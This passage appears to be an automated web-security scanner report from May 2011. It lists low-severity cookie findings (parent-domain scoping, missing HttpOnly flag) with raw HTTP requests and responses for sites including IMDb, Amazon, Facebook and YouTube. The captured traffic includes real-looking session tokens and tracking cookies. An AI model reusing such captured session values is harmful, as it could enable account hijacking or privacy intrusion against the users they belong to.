Cookie: bkp1=; bku=exy99JnggW62duLG; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bklc=4dcbc695; bk=tOsYp6BGpSIVIHOf; bkc=KJh56e2n96WxCFc7d/1Z3YetuKWoPCj3oSYWNazZoBOYm46/QGJyvCSiCxC3/pqs0MnRVTPG9+RtRilt9DayJpv8ZtNZIEcF00fqcRwagReALh6axB58pFwaA7D7+Yb5RgyIkwot9nftTq3jrMBFl4RL44VtsyIEXaHdfqFrV4n3hpy6sFOt7lgkhag0b+Wz4nM2PzScr2SJjIZg46zQl/cnG8KIopNnUk6RC2o1xvVzI7LVRXZgWdK4CVJ9FJybwLORXroBBIfmRYoMtSF5PS0bdFkYvhoArm53lggiV4g37y7RK9dRYN+HAqVKS8bk7fU6NEZlKff8+fhccO2qkhJgm5PdJpmxOy==; bko=KJ0naVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EeX6Mf30XByO0CVD7wxkTkOkGIOGKcOSP2POAAGuTQCevMUC7X4DvXBAsDvj77pxkC1e/kxaMBeaPec0uDfQnnsf9y1IX9L9aT7/E/=; bkw5=KJppLZD9QZSsW6YuszHARsETpMwOCJaO09TCyTxiTtRwRM5ehjOkpJNh0x99gB61G9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:31:36 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 13 May 2011 13:31:36 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=EsRCqABGpSIVIHOf; expires=Tue, 08-Nov-2011 13:31:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh561XgHaWRhFcF2uBZxL7mRZqCAoDaa3JGLgfn6uhR6mPwDJub0W/LoneHq/0PRMcjShRSjLgSHZhkg8H0l+Wf88bpKKd22efwFS5EYIOrssRIsoa8oVqsgK4knrFFwoCSY6MKgzz2760fqGSrYTzTkrIgnpFQzhFmcbtqWbTq73VFUM4MKCervX2+PphnU7tECVGPU3bL8y8zuNf5ZTWlLp2nKU4E5KJjIrg4cQQlTcEF3K6Hp8JU8d3CBOoxUnEIsLmh8BVJrz2zwiYK+R8lzYh82SGj8u1Ruk7tSF1g8AldKn/K55n5XknV55sp2BDd9fe0sg9PN31XY0tUwWLdqKZg1tqlzwaFmRXTl755uapnDd6cDKYSNy==; expires=Tue, 08-Nov-2011 13:31:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:31:36 GMT; path=/; domain=.bluekai.com
BK-Server: 45b2
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
8.79. http://uts.amazon.com/uts/IaR  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uts.amazon.com
Path:   /uts/IaR

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /uts/IaR?dmnId=imdb.com&tId=&dId=&enId=undefined&eId=view&pId=tt0758746&rP=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0758746%2F&njh=undefined&cB=7672316606622189 HTTP/1.1
Host: uts.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lc-main=en_US; s_pers=%20s_ev15%3D%255B%255B%2527Typed/Bookmarked%2527%252C%25271303907323249%2527%255D%252C%255B%2527Typed/Bookmarked%2527%252C%25271303911653101%2527%255D%252C%255B%2527www.webstoresellmore.com%2527%252C%25271303919819108%2527%255D%255D%7C1461772619108%3B%20s_dl%3D1%7C1303921676354%3B%20gpv_page%3DUS%253AWS%253APricing-Options%253APricing-Options%7C1303921676363%3B; _mkto_trk=id:810-GRW-452&token:_mch-amazon.com-1303907323369-39830; session-token=45h19hdOPPJ6wOOfLpRhuZ5a+tHbJN0Yn1Pz8Mt9SC8iEu30sQidjghp+yiRcg/lJEw2MQjNsYBTvrnFumfZbugF8QO2HHy6dOzlE94Gg05TyeLIRgBJLrI+NTqi0wO2wJ403GqaJfi7BSth5OxeeVFJ5+daAcNcUOZouvxnpaoJRaKE8bf5vC00RyndOSQu2HP0E3/TBVDD9LtynyiLetGL0vfAM8K9mCUTAxjCXQMh0pHaCNNAFi5s78XmwXgR; __utma=194891197.750670333.1304243790.1304243790.1304243790.1; __utmz=194891197.1304243790.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ubid-main=177-8019787-9467434; session-id-time=2082787201l; session-id=175-8214368-0288160; apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:59 GMT
Server: Server
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cneonction: close
Set-Cookie: apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb; Domain=amazon.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 0

8.80. http://www.crowdsavings.com/r/banner/170x170/milehighonthecheap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crowdsavings.com
Path:   /r/banner/170x170/milehighonthecheap

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/banner/170x170/milehighonthecheap HTTP/1.1
Host: www.crowdsavings.com
Proxy-Connection: keep-alive
Referer: http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:04 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: image/jpeg
P3P: policyref="/w3c/p3p.xml"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=3kn9i6tscu08iia3c02bsn9ld5; path=/
Set-Cookie: __cookie=1; expires=Wed, 12-May-2021 13:32:04 GMT; path=/; domain=.crowdsavings.com
Set-Cookie: __request_uri=%2Fr%2Fbanner%2F170x170%2Fmilehighonthecheap; expires=Sat, 12-May-2012 13:32:05 GMT; path=/; domain=.crowdsavings.com
Set-Cookie: __http_referrer=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F; expires=Sat, 12-May-2012 13:32:05 GMT; path=/; domain=.crowdsavings.com
Set-Cookie: __query_string=%26request%3Dr%2Fbanner%2F170x170%26code%3Dmilehighonthecheap%26; expires=Sat, 12-May-2012 13:32:05 GMT; path=/; domain=.crowdsavings.com
Set-Cookie: X-Mapping-hmaddpem=80CD787A1CE04136E84BE3A2169031AF; path=/
Content-Length: 24974

......JFIF.....H.H.....C....................................................................C............................................................................"............................    .
...[SNIP]...
8.81. http://www.facebook.com/profile/pic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile/pic.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile/pic.php?oid=AAAAAwAgACAAAAAPGpkM39yYlC_-UQcTRgxu115hCphFd69BTobv3zY9xZY7WP-WDuLyWDbPxFawXyrcSw4ffa4vChZeGBdrwOK57vjarYsCwdr9S1EjPNuHQuczIh9EfBu6C5gj_JnGO43L&size=square HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=LF24m; path=/; domain=.facebook.com
X-FB-Server: 10.27.62.105
X-Cnection: close
Date: Thu, 12 May 2011 13:30:51 GMT
Content-Length: 393

GIF89a2.2....................................................................................................!.......,....2.2....`'.di.h..l.~p,.tm.x..|_...$.+....g.    ..1.I.@...u..\{.....-..G.&@...Y.M.
...[SNIP]...
8.82. http://www.youtube.com/embed/TVqe8ieqz10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/TVqe8ieqz10

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/TVqe8ieqz10?rel=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:28 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: GEO=c0df1fc5fad584dccc67bc540e26ae88cwsAAAAzVVOtwdbzTcvguA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 11186
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Introducing the Chromebook</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflZITYGO.css">


</head>
<body>
<d
...[SNIP]...
8.83. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:53 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:27:53 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 108541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
8.84. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.warnerbros.com
Path:   /all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /all/us/omniture/s_code_wbrostheatricaldomesticdvd.js HTTP/1.1
Host: www2.warnerbros.com
Proxy-Connection: keep-alive
Referer: http://www.fridaythe13thmovie.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:05 GMT
Server: Apache
Set-cookie: WBWTID=173.193.214.243-4DCBE11918E0000209F5816-www2-wwwintl-web08; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Thu, 01 Oct 2009 17:56:44 GMT
ETag: "74522-64b3-5ed10f00"
Accept-Ranges: bytes
Content-Length: 25779
Content-Type: application/javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="wbrostheatricaldomesticdvd"
var s=s_gi(s_account)
/****
...[SNIP]...
9. Cookie without HttpOnly flag set  previous  next
There are 111 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

9.1. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://crenk.com
Path:   /wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php?si_form_id=com&prefix=wo6hyymFBHypPTmk HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: image/png
Date: Thu, 12 May 2011 13:31:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: PHPSESSID=1va8ml47spt1lnmp0r3h68a0e2; path=/
Last-Modified: Thu, 12 May 2011 13:31:22GMT
Content-Length: 5485

.PNG
.
...IHDR.......<.......}....4IDATx..]a.U.q..[|.c..,..n...1D2.#..v-.".....m.eY.....5.C+..Z.Mp(.q..Ua.YtC$.5..Y.....h.l..HK...y..e...{.N..y;;..9s.v....{.=g.9sf..3.nadd....Z..Q.X..b.x..s..C..#.,.
...[SNIP]...
9.2. http://mysuburbanlife.mycapture.com/mycapture/scripts/remote.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mysuburbanlife.mycapture.com
Path:   /mycapture/scripts/remote.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycapture/scripts/remote.asp HTTP/1.1
Host: mysuburbanlife.mycapture.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript
Expires: Thu, 12 May 2011 13:29:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACCRBRRS=NOHNGADBFDNMDKENEBEAENMC; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Thu, 12 May 2011 13:30:34 GMT
Content-Length: 16937


//<script type="txt/javascript">
/*SCRIPT TO CREATE BUY NOW LINK ON REMOTE SITES*/
var myC_Remote = {

init : function() {
/* Primary Settings */
this.BuyImageURL = "http:/
...[SNIP]...
9.3. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850472&migRandom=845927450&migTagDesc=Cingular&migAtlSA=286444146&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QJT9qC10CWN|N10CXL|U10JLR; NXCLICK2=011QJT9qNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiExecutivesData_NX_NonSecure!y!B3!JLR!Hfl; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:00 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Tue, 05-Jun-12 13:34:00 GMT; domain=.mookie1.com
Set-Cookie: session=1305207240|1305207240; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;
9.4. http://www.crowdsavings.com/r/banner/170x170/milehighonthecheap  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.crowdsavings.com
Path:   /r/banner/170x170/milehighonthecheap

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/banner/170x170/milehighonthecheap HTTP/1.1
Host: www.crowdsavings.com
Proxy-Connection: keep-alive
Referer: http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:04 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: image/jpeg
P3P: policyref="/w3c/p3p.xml"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=3kn9i6tscu08iia3c02bsn9ld5; path=/
Set-Cookie: __cookie=1; expires=Wed, 12-May-2021 13:32:04 GMT; path=/; domain=.crowdsavings.com
Set-Cookie: __request_uri=%2Fr%2Fbanner%2F170x170%2Fmilehighonthecheap; expires=Sat, 12-May-2012 13:32:05 GMT; path=/; domain=.crowdsavings.com
Set-Cookie: __http_referrer=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F; expires=Sat, 12-May-2012 13:32:05 GMT; path=/; domain=.crowdsavings.com
Set-Cookie: __query_string=%26request%3Dr%2Fbanner%2F170x170%26code%3Dmilehighonthecheap%26; expires=Sat, 12-May-2012 13:32:05 GMT; path=/; domain=.crowdsavings.com
Set-Cookie: X-Mapping-hmaddpem=80CD787A1CE04136E84BE3A2169031AF; path=/
Content-Length: 24974

......JFIF.....H.H.....C....................................................................C............................................................................"............................    .
...[SNIP]...
9.5. http://www.imdb.com/title/tt0758746/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.imdb.com
Path:   /title/tt0758746/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /title/tt0758746/ HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: uu=BCYoEYVRn4Z080oVMyaiqkqVil4NObOLHdXg6V5nGFmrKaSp0r5qR1B2q9QdB7DhaW1bB8f4YSIcdmATWdaiYxq_IKR6HKOfkXgDQfVNYlQiBpSUrIq7tamZGfahcbUG9demse85k_CYY6GSxnL7TXGOTdF22fYw9tuZoqsJ96-9rbgaeJ1YzXUvXfDBmlNbH7O2NATYg9Gj1v-3XgpM4a7BxgwwkkhBCdF9BCMNauUPDHvyMm6Wd_QvKZjUSKBxpz_0SyBElOdhtkg2XpExQVhTtg;expires=Thu, 30 Dec 2037 00:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=x1X0LC0cCNNUopm1JgkB7wCmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupZmeM2jsk9fJ9HNKeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=5DCTg6yZP2fcEVMbF0nxoAiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9gaIiSL/CSSbf6WwAmZspee2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=Qy5PblGX7FQYyXU8oLHhYQiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9l9kiSN/yWjjd13MsmZspeu2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=lCczZSsnIliq67dpM+chZACmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupbHGr/ThyscN9HNKfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=QkXpKjI6/xJZJiwqwOYA/gbGfbqgkW2NmIHl2qOCXrojwk650DJ+iaCRbYoGES2aoJFb/fcWXbqj05s5t9HNyfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=7FXQMV6N2neppbMXfWZiOwenOqqgkW26kBl9MsPifomjkj6ZoDHOqZCRbbqXx+36gJFtjOSnGIqjpggpN9HNOeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: session-id=864-5207130-5211698;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Set-Cookie: session-id-time=1462887130;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 93623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
9.6. http://www.pcworld.com/articleComment/get.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /articleComment/get.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /articleComment/get.do?threadId=117973&style=default&ord=7123965 HTTP/1.1
Host: www.pcworld.com
